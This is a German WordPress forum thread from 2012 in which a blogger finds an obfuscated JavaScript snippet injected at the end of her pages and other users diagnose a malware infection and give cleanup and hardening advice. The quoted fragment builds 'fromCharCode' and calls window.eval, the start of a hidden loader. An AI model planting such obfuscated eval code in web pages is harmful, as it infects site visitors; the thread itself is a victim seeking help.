Hat sich da was eingeschlichen?

Zwergenmama · 2. März 2012

Hallo Wp´ler
Seit ein paar Tagen bekomme ich von Lesern auf meinem Blog Nachrichten, daß das Aufrufen meiner Seite blockiert wird, aufgrund eines Java Scripts..
Ich habe aber schon eine ewigkeit keine neuen Scripte eingefügt.
Ich habe vor kurzem auf 3.3.1 erweitert.
Ansonsten habe ich nur das Plugin Wizzart - Recent Comments eingefügt.
Wenn ich mir den Quelltext meines Blogs ansehe, erscheint dort ganz am Ende ein Script nach /html

if(window.document)try{location(12);}catch(qqq){aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window.eval;t='y';}h=-2*Math.log
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Das zieht sich über 50 Zeilen.
Kann mir jemand verraten, wie ich dies entfernen kann???
Was das berhaupt ist, und wie es dort hingelangt ist??

(Ich hoffe ich bin im richtigen Forum gelandet...)

LG

Col Pain · 2. März 2012

Hallo,

leider ist deine Seite mit Malware verseucht: http://sitecheck.sucuri.net/results/Zwergenmama.de

Bitte ganz schnell die Seite offline setzen und bereinigen. Du musst auch die Sicherheitslücke finden, durch die der Angriff erfolgt ist. Dabei auch den eigenen Rechner nicht außer acht lassen. Ein Trojaner oder Keylogger könnte z.B. deine Passwörter ausgespät haben.

Daher müssen auch umgehend alle Passwörter von einem sicheren PC aus geändert werden. Einfach eine Datei säubern wird in diesem Fall leider auch nicht reichen, da man nach einem Hack keiner Datei auf dem Webspace mehr trauen kann. Wenn du die Säuberung nicht selbst durchführen kannst oder willst, findest du sicher in der Jobbörse einen Profi, der das für dich übernimmt.

Viele Grüße Col

gericoach · 2. März 2012

olala, da herrscht ja höchste Seuchenstufe.
Zu dem, was Dir Col Pain geschrieben hat, möchte ich noch was hinzufügen: informiere all die Leute, die Dich informiert haben, dass da ein JavaScript Probleme macht, da sie anscheinend nicht mitbekommen haben, dass sich diese Malware nun auch bei Ihnen breit macht. Sie sollten umgehend ihr System scannen...
Mein Download-Tipp: Malwarebytes

Zwergenmama · 2. März 2012

Ufff......
Danke für euren Rat.
Blog ist Offline...
Passwörter alle geändert, PC geprüft.. und allen bescheid gegeben...
Was für ein Tiefschlag...

Zwergenmama · 3. März 2012

Bevor ich mich nun an die Arbeit setzte und alles neu mache, wollte ich gerne mal wissen, wie soetwas eigentlich zu Stande kommt.
Wie kann sich etwas in den Blog einnisten!?
Über den FTP Zugang? Dazu müsste doch jemand die Logindaten haben.
Was kann ich tun, damit (sollte ich einen neuen Blog machen) der sicher ist!?

r23 · 3. März 2012

Zitat von Zwergenmama: ↑

Bevor ich mich nun an die Arbeit setzte und alles neu mache, wollte ich gerne mal wissen, wie soetwas eigentlich zu Stande kommt.
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

es gibt leider einige wenige Plugins die fehlerhaft sind
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=wordpress

dann gibt es wenige Fehler in dem verwendeten Template. wir beschäftigen uns hier seit ein paar Tagen mit einem Webdesinger, der recht abenteuerlich Sachen macht - er verteilt dies auch noch munter weiter

und dann gibt es einige wenige Hammer Sicherheitslücken.
http://www.heise.de/security/meldung/Kritische-Sicherheitsluecke-in-Wordpress-Addon-Timthumb-1317795.html

da kann man warnen, da kann man zu einem update empfehlen - da passiert nichts - erst wenn das Blog gehackt wurde ... kommt der Blogger mal auf die Idee sein veraltetes system upzudaten ...

Sinnigerweise pasiert dies auch mit der Umgebung selber. Auch PHP wird ständig weiter entwickelt ... egal - der massen hoster mit seiner Kiste bietet halt nur Schrott an - man beleibt bei ihm diesem Hoster halt ...

Zitat von Zwergenmama: ↑

Über den FTP Zugang? Dazu müsste doch jemand die Logindaten haben.
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Über eine Sicherheitslücke in Apache und PHP benötigt er diese FTP-Zugangsdaten nicht oder er legt sich eben selber neue an.

Über Lücken - wie eben der genannten Timthumb kann der Hacker alles mit dem Server machen... nicht nur neue Dateien anlegen... aber... egal..

viel erfolg beim updaten und absichern!

ralf

Zwergenmama · 6. März 2012

Sorry aber ich verstehe jetzt nicht, was du mir damit Mitteilen willst.

Das ich evtl ein Plugin runtergeladen habe, was fehlerhaft war?
oder meine Version von WP nicht erweitert habe...?#
Von der geposteten Pluginseite habe ich ebenfalls keine Plugins runtergelden.
Und immer die neue Version von WP Installiert bzw. erweitert.

WPDE.org

Hat sich da was eingeschlichen?

Zwergenmama Well-Known Member

Col Pain Well-Known Member

gericoach Well-Known Member

Zwergenmama Well-Known Member

Zwergenmama Well-Known Member

r23 Well-Known Member

Zwergenmama Well-Known Member

Nützliche Suchen

Hat sich da was eingeschlichen?

Zwergenmama Well-Known Member

Col Pain Well-Known Member

gericoach Well-Known Member

Zwergenmama Well-Known Member

Zwergenmama Well-Known Member

r23 Well-Known Member

Zwergenmama Well-Known Member